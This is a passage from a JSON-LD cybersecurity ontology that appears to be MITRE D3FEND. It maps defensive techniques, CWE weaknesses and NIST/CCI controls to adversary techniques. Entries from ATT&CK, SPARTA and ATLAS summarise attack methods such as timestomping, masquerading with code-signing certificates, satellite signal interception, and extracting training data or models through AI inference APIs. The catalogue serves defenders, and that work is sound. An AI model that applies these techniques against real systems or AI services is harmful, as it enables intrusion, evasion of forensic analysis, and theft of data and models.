          "@id": "_:N2b1c06f4e46d4fdabbbfb2664fc36f02"
        }
      ]
    },
    {
      "@id": "_:N13f7f8b2d11542319909992da79d27a1",
      "@type": "owl:Class",
      "owl:unionOf": {
        "@list": [
          {
            "@id": "d3f:TCPEvent"
          },
          {
            "@id": "d3f:UDPEvent"
          }
        ]
      }
    },
    {
      "@id": "_:N2b1c06f4e46d4fdabbbfb2664fc36f02",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RDPSession"
      }
    },
    {
      "@id": "d3f:UserManualReference",
      "@type": "owl:Class",
      "d3f:pref-label": "User Manual",
      "rdfs:label": "User Manual Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:T1099",
      "@type": "owl:Class",
      "d3f:attack-id": "T1099",
      "d3f:definition": "Adversaries may take actions to hide the deployment of new, or modification of existing files to obfuscate their activities. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1070.006",
      "rdfs:label": "Timestomp",
      "rdfs:seeAlso": {
        "@id": "d3f:T1070.006"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:PhysicalLinkDisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An administrator issues a shutdown or disable command, forcing the link out of service regardless of signal status.",
      "rdfs:label": "Physical Link Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkEvent"
        },
        {
          "@id": "_:Naf358ffd3cdc47df9dc697b6d1292409"
        }
      ]
    },
    {
      "@id": "_:Naf358ffd3cdc47df9dc697b6d1292409",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkUpEvent"
      }
    },
    {
      "@id": "d3f:UserBehaviorAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UserBehaviorAnalysis"
      ],
      "d3f:d3fend-id": "D3-UBA",
      "d3f:definition": "User behavior analytics (\"UBA\") as defined by Gartner, is a cybersecurity process about detection of insider threats, targeted attacks, and financial fraud. UBA solutions look at patterns of human behavior, and then apply algorithms and statistical analysis to detect meaningful anomalies from those patterns-anomalies that indicate potential threats.' Instead of tracking devices or security events, UBA tracks a system's users. Big data platforms are increasing UBA functionality by allowing them to analyze petabytes worth of data to detect insider threats and advanced persistent threats.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "d3f:kb-article": "## Technique Overview\n\nSome techniques monitor patterns of human behavior and then apply algorithms and to identify patterns such as repeated login attempts from a single IP address or large file downloads, or abnormal accesses.\n\nOther techniques may have explicit or rigid definitions of \"bad behavior\" which are then matched against instances in a computer network environment.",
      "d3f:synonym": [
        "Credential Monitoring",
        "UBA"
      ],
      "rdfs:isDefinedBy": {
        "@id": "dbr:User_behavior_analytics"
      },
      "rdfs:label": "User Behavior Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N5795a8295b39455da3dc403efd7e3c7f"
        }
      ]
    },
    {
      "@id": "_:N5795a8295b39455da3dc403efd7e3c7f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-6_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Timely Maintenance | Automated Support for Predictive Maintenance",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "MA-6(3)"
    },
    {
      "@id": "d3f:CCI-001084_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system isolates security functions from nonsecurity functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001084"
    },
    {
      "@id": "d3f:ApplicationConfigurationModificationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which the configuration of a specific software application is changed, affecting how that application executes, interacts with other components, or exposes functionality to users or services.",
      "rdfs:label": "Application Configuration Modification Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationModificationEvent"
        },
        {
          "@id": "_:N817d314aaf7c4f249a9c186870e7c7ea"
        },
        {
          "@id": "_:N525f0fb659134799a449f1f13950f46e"
        }
      ]
    },
    {
      "@id": "_:N817d314aaf7c4f249a9c186870e7c7ea",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "_:N525f0fb659134799a449f1f13950f46e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationUpdateEvent"
      }
    },
    {
      "@id": "d3f:DatabaseQuery",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A specific query expressed in SQL, SPARQL, or similar language against a database.",
      "d3f:queries": {
        "@id": "d3f:Database"
      },
      "rdfs:label": "Database Query",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Command"
        },
        {
          "@id": "_:N9b6734b7043e4d7883b76583dab87353"
        }
      ]
    },
    {
      "@id": "_:N9b6734b7043e4d7883b76583dab87353",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:queries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:T1116",
      "@type": "owl:Class",
      "d3f:attack-id": "T1116",
      "d3f:definition": "Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1553.002",
      "rdfs:label": "Code Signing",
      "rdfs:seeAlso": {
        "@id": "d3f:T1553.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:ProcessTree",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Process"
      },
      "d3f:definition": "A process tree is a tree structure representation of parent-child relationships established via process spawn operations.",
      "rdfs:label": "Process Tree",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ProcessSpawnAnalysis"
        },
        {
          "@id": "dbr:Child_process"
        },
        {
          "@id": "dbr:Parent_process"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N94a9d75847b342dc9af90d2b29bb456c"
        }
      ]
    },
    {
      "@id": "_:N94a9d75847b342dc9af90d2b29bb456c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:CWE-209",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-209",
      "d3f:definition": "The product generates an error message that includes sensitive information about its environment, users, or associated data.",
      "rdfs:label": "Generation of Error Message Containing Sensitive Information",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-200"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:Summarizing",
      "@type": "owl:Class",
      "rdfs:label": "Summarizing",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticalPurpose"
      }
    },
    {
      "@id": "d3f:ActivePhysicalLinkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ActivePhysicalLinkMapping"
      ],
      "d3f:d3fend-id": "D3-APLM",
      "d3f:definition": "Active physical link mapping sends and receives network traffic as a means to map the physical layer.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-IdentificationOfTracerouteNodesAndAssociatedDevices"
        },
        {
          "@id": "d3f:Reference-UsingSpanningTreeProtocolSTPToEnhanceLayer2NetworkTopologyMaps"
        }
      ],
      "d3f:may-query": {
        "@id": "d3f:NetworkAgent"
      },
      "d3f:synonym": "Active Physical Layer Mapping",
      "owl:disjointWith": {
        "@id": "d3f:DirectPhysicalLinkMapping"
      },
      "rdfs:label": "Active Physical Link Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkMapping"
        },
        {
          "@id": "_:Ne626638544424dbfbd17748d11128077"
        }
      ]
    },
    {
      "@id": "_:Ne626638544424dbfbd17748d11128077",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-query"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkAgent"
      }
    },
    {
      "@id": "d3f:CWE-587",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-587",
      "d3f:definition": "The product sets a pointer to a specific address other than NULL or 0.",
      "rdfs:label": "Assignment of a Fixed Address to a Pointer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-344"
        },
        {
          "@id": "d3f:CWE-758"
        }
      ]
    },
    {
      "@id": "d3f:CWE-244",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-244",
      "d3f:definition": "Using realloc() to resize buffers that store sensitive information can leave the sensitive information exposed to attack, because it is not removed from memory.",
      "rdfs:label": "Improper Clearing of Heap Memory Before Release ('Heap Inspection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-226"
      }
    },
    {
      "@id": "d3f:CWE-792",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-792",
      "d3f:definition": "The product receives data from an upstream component, but does not completely filter one or more instances of special elements before sending it to a downstream component.",
      "rdfs:label": "Incomplete Filtering of One or More Instances of Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-791"
      }
    },
    {
      "@id": "d3f:CWE-97",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-97",
      "d3f:definition": "The product generates a web page, but does not neutralize or incorrectly neutralizes user-controllable input that could be interpreted as a server-side include (SSI) directive.",
      "rdfs:label": "Improper Neutralization of Server-Side Includes (SSI) Within a Web Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-96"
      }
    },
    {
      "@id": "d3f:attack-may-be-countered-by",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "attack-may-be-countered-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-tactically-associated-with"
      }
    },
    {
      "@id": "d3f:EXF-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0003",
      "d3f:definition": "The adversary captures mission traffic in transit, on ground networks or over the space link, so that payload products, housekeeping, and command/ack exchanges can be reconstructed offline. Vantage points include tapped ground LANs/WANs between MOC and stations, baseband interfaces (IF/IQ), RF/optical receptions within the antenna field of view, and crosslink monitors. Depending on protection, the haul ranges from plaintext frames to encrypted bitstreams whose headers, rates, and schedules still yield valuable context (APIDs, VCIDs, pass timing, file manifest cues). Intercepted sessions can guide later replay, cloning, or targeted downlink requests.",
      "rdfs:label": "Signal Interception - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Signal Interception"
    },
    {
      "@id": "d3f:CWE-1287",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1287",
      "d3f:definition": "The product receives input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type.",
      "rdfs:label": "Improper Validation of Specified Type of Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:T1573.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1573.001",
      "d3f:creates": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      },
      "d3f:definition": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.",
      "rdfs:label": "Symmetric Cryptography",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1573"
        },
        {
          "@id": "_:N2ba8ad22e4b9464d80b131b25d82e693"
        }
      ]
    },
    {
      "@id": "_:N2ba8ad22e4b9464d80b131b25d82e693",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      }
    },
    {
      "@id": "d3f:RDPSession",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Remote Desktop Protocol (RDP) session is a session established using the RDP protocol to access Remove Desktop Services (RDS).",
      "rdfs:label": "RDP Session",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Remote_Desktop_Protocol"
        },
        {
          "@id": "dbr:Remote_Desktop_Services"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:RemoteSession"
      },
      "skos:altLabel": [
        "Remote Desktop Session",
        "Terminal Services"
      ]
    },
    {
      "@id": "d3f:CCI-001117_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system checks incoming communications to ensure the communications are coming from an authorized source and routed to an authorized destination.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001117"
    },
    {
      "@id": "d3f:DS0001",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI",
      "rdfs:comment": "This data source captures events relating to firmware and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Firmware (ATT&CK DS)"
    },
    {
      "@id": "d3f:CWE-425",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-425",
      "d3f:definition": "The web application does not adequately enforce appropriate authorization on all restricted URLs, scripts, or files.",
      "d3f:synonym": "forced browsing",
      "rdfs:label": "Direct Request ('Forced Browsing')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-288"
        },
        {
          "@id": "d3f:CWE-424"
        },
        {
          "@id": "d3f:CWE-862"
        }
      ]
    },
    {
      "@id": "d3f:ControlCatalog",
      "@type": "owl:Class",
      "d3f:definition": "A control catalog is a complete list of protective measures for systems, organizations, or individuals for subject domains (e.g., security and privacy.)",
      "rdfs:label": "Control Catalog",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/06499734-n"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExternalControlThing"
        },
        {
          "@id": "_:Nde7ef0c3984b4f82924e8b9fc00462b9"
        },
        {
          "@id": "_:N81991b4df1174161818457bbdeaf1e20"
        }
      ]
    },
    {
      "@id": "_:Nde7ef0c3984b4f82924e8b9fc00462b9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-member"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExternalControl"
      }
    },
    {
      "@id": "_:N81991b4df1174161818457bbdeaf1e20",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:version"
      },
      "owl:someValuesFrom": {
        "@id": "_:N81f12ffd1b544e348a27ac09fc332c6e"
      }
    },
    {
      "@id": "_:N81f12ffd1b544e348a27ac09fc332c6e",
      "@type": "rdfs:Datatype",
      "owl:unionOf": {
        "@list": [
          {
            "@id": "xsd:integer"
          },
          {
            "@id": "xsd:string"
          }
        ]
      }
    },
    {
      "@id": "d3f:FileInternalStructureVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileInternalStructureVerification"
      ],
      "d3f:analyzes": {
        "@id": "d3f:FileContentBlock"
      },
      "d3f:d3fend-id": "D3-FISV",
      "d3f:definition": "The process of checking specific static values within a file, such as file signatures or magic numbers, to ensure they match the expected values defined by the file format specification.",
      "d3f:kb-article": "## How it works\n\nFile format specifications often define expected values for specific fields. A common example are file signatures, or magic numbers, which are used to quickly identify files. Another example is within the Compound Document Header of Microsoft Office files, the 29th and 30th byte identifies the byte order, specifically 0xFFFE for little-endian. This technique verifies that the file's static values match the values of the declared file format's specification.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CarvingContiguousandFragmentedFilesWithFastObjectValidation"
        },
        {
          "@id": "d3f:Reference-GatheringEvidenceModel-DrivenSoftwareEngineeringinAutomatedDigitalForensics"
        }
      ],
      "rdfs:label": "File Internal Structure Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileFormatVerification"
        },
        {
          "@id": "_:Nf99c6f0c82e34c8a811c3493e10922c1"
        }
      ]
    },
    {
      "@id": "_:Nf99c6f0c82e34c8a811c3493e10922c1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileContentBlock"
      }
    },
    {
      "@id": "d3f:process-security-context",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x process-security-context y: The process x has the process security context data y.",
      "rdfs:domain": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "process-security-context",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-data-property"
      }
    },
    {
      "@id": "d3f:OSAPIGetSystemTime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that retrieves the current system time or timestamp.",
      "d3f:invokes": {
        "@id": "d3f:GetSystemTime"
      },
      "rdfs:label": "OS API Get System Time",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N01c71b3d3c62496688813c3a57b8c319"
        }
      ]
    },
    {
      "@id": "_:N01c71b3d3c62496688813c3a57b8c319",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetSystemTime"
      }
    },
    {
      "@id": "d3f:Reference-UseRkillToStopMalwareProcesses-Ghacks.net",
      "@type": [
        "owl:NamedIndividual",
        "d3f:TechniqueReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.ghacks.net/2011/07/29/use-rkill-to-stop-malware-processes/"
      },
      "d3f:kb-author": "Melanie Gross",
      "d3f:kb-organization": "ghacks.net",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessTermination"
      },
      "d3f:kb-reference-title": "Use Rkill to Stop Malware Processes",
      "rdfs:label": "Reference - Use Rkill to Stop Malware Processes - ghacks.net"
    },
    {
      "@id": "d3f:CWE-483",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-483",
      "d3f:definition": "The code does not explicitly delimit a block that is intended to contain 2 or more statements, creating a logic error.",
      "rdfs:label": "Incorrect Block Delimitation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-670"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_10",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:control-name": "Information Flow Enforcement | Enable and Disable Security or Privacy Policy Filters",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-4(10)"
    },
    {
      "@id": "d3f:InternationalizedDomainName",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DomainName"
      ],
      "rdfs:label": "Internationalized Domain Name"
    },
    {
      "@id": "d3f:ATTACKMobileExfiltrationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0036"
      },
      "rdfs:label": "Exfiltration Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:Nbd5f8dfcf28f4205863eaf435cbfa468"
        }
      ],
      "skos:prefLabel": "Exfiltration Technique"
    },
    {
      "@id": "_:Nbd5f8dfcf28f4205863eaf435cbfa468",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0036"
      }
    },
    {
      "@id": "d3f:CCI-001953_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system accepts Personal Identity Verification (PIV) credentials.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001953"
    },
    {
      "@id": "d3f:AML.T0002.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0002.001",
      "d3f:definition": "Adversaries may acquire public models to use in their operations.\nAdversaries may seek models used by the victim organization or models that are representative of those used by the victim organization.\nRepresentative models may include model architectures, or pre-trained models which define the architecture as well as model parameters from training on a dataset.\nThe adversary may search public sources for common model architecture configuration file formats such as YAML or Python configuration files, and common model storage file formats such as ONNX (.onnx), HDF5 (.h5), Pickle (.pkl), PyTorch (.pth), or TensorFlow (.pb, .tflite).\n\nAcquired models are useful in advancing the adversary's operations and are frequently used to tailor attacks to the victim model.",
      "rdfs:label": "Models - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0002.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0002"
      },
      "skos:prefLabel": "Models"
    },
    {
      "@id": "d3f:OTProcessVariable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Process variables are the current actual measurement of the physical characteristics of a system. Common process variables include but are not limited to Temperature, Pressure, Level, and Flow.",
      "rdfs:label": "OT Process Variable",
      "rdfs:seeAlso": {
        "@id": "https://isagca.org/hubfs/2023%20ISA%20Website%20Redesigns/ISAGCA/PDFs/Industrial%20Cybersecurity%20Knowledge%20FINAL.pdf?hsLang=en"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OTLogicVariable"
      },
      "skos:example": "If the current temperature in a home is 82 degrees Fahrenheit, the process variable is 82 degrees."
    },
    {
      "@id": "d3f:VolumeBootRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A volume boot record (VBR) (also known as a volume boot sector, a partition boot record or a partition boot sector) is a type of boot sector introduced by the IBM Personal Computer. It may be found on a partitioned data storage device, such as a hard disk, or an unpartitioned device, such as a floppy disk, and contains machine code for bootstrapping programs (usually, but not necessarily, operating systems) stored in other parts of the device. On non-partitioned storage devices, it is the first sector of the device. On partitioned devices, it is the first sector of an individual partition on the device, with the first sector of the entire device being a Master Boot Record (MBR) containing the partition table.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Volume_boot_record"
      },
      "rdfs:label": "Volume Boot Record",
      "rdfs:subClassOf": {
        "@id": "d3f:BootRecord"
      }
    },
    {
      "@id": "d3f:NetworkFrame",
      "@type": "owl:Class",
      "d3f:definition": "A finite, self-delimited sequence of bits exchanged as one unit over a single data link. Formed by link-layer encapsulation, a frame typically begins with synchronization and control fields, carries a payload, ends with an integrity check, and is bounded from adjacent frames by explicit timing or delimiter symbols.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Frame_(networking)"
      },
      "rdfs:label": "Network Frame",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "Frame"
    },
    {
      "@id": "d3f:CCI-001144_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements required cryptographic protections using cryptographic modules that comply with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001144"
    },
    {
      "@id": "d3f:AML.T0024",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0024",
      "d3f:definition": "Adversaries may exfiltrate private information via [AI Model Inference API Access](/techniques/AML.T0040).\nAI Models have been shown leak private information about their training data (e.g.  [Infer Training Data Membership](/techniques/AML.T0024.000), [Invert AI Model](/techniques/AML.T0024.001)).\nThe model itself may also be extracted ([Extract AI Model](/techniques/AML.T0024.002)) for the purposes of [AI Intellectual Property Theft](/techniques/AML.T0048.004).\n\nExfiltration of information relating to private training data raises privacy concerns.\nPrivate training data may include personally identifiable information, or other protected data.",
      "rdfs:label": "Exfiltration via AI Inference API - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0024"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExfiltrationTechnique"
      },
      "skos:prefLabel": "Exfiltration via AI Inference API"
    },
    {
      "@id": "d3f:T1059.009",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.009",
      "d3f:definition": "Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: Microsoft - Azure PowerShell), or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006).",
      "rdfs:label": "Cloud API",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:T1070.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1070.006",
      "d3f:definition": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.",
      "d3f:forges": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "Timestomp",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1070"
        },
        {
          "@id": "_:Neb6a51e7138d4c0483c7221dc84f1783"
        }
      ]
    },
    {
      "@id": "_:Neb6a51e7138d4c0483c7221dc84f1783",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:forges"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:TA0028",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Persistence - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Persistence"
    },
    {
      "@id": "d3f:VideoSurveillance",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:VideoSurveillance"
      ],
      "d3f:d3fend-id": "D3-VS",
      "d3f:definition": "Monitoring of physical areas via camera video feeds to deter, detect, and investigate unauthorized access and related security events.",
      "d3f:kb-article": "## How it works\n\nVideo surveillance uses digital cameras that stream to a video management system (VMS) or network video recorder (NVR) for live monitoring, recording, and retrieval. Recording can be continuous or event-driven using analytics (motion in regions of interest, line crossing) or external triggers (access denials, sensor alarms). Time synchronization aligns video with other logs, while health monitoring detects camera outages and tamper. Secure export workflows preserve integrity for investigations.\n\n## Considerations\n\n* Plan camera placement and coverage to avoid occlusions and handle challenging lighting; select lenses and mounting to capture entry points and critical areas.\n* Size storage and bandwidth for the intended retention period by choosing appropriate resolution, frame rate, and compression, and monitor capacity over time.\n* Secure cameras and management systems with unique credentials, timely firmware updates, encrypted transport, and network segmentation to limit exposure.\n* Address privacy and legal obligations with visible notice, role-based access to footage, and retention policies aligned with regulations and organizational policy.\n* Monitor 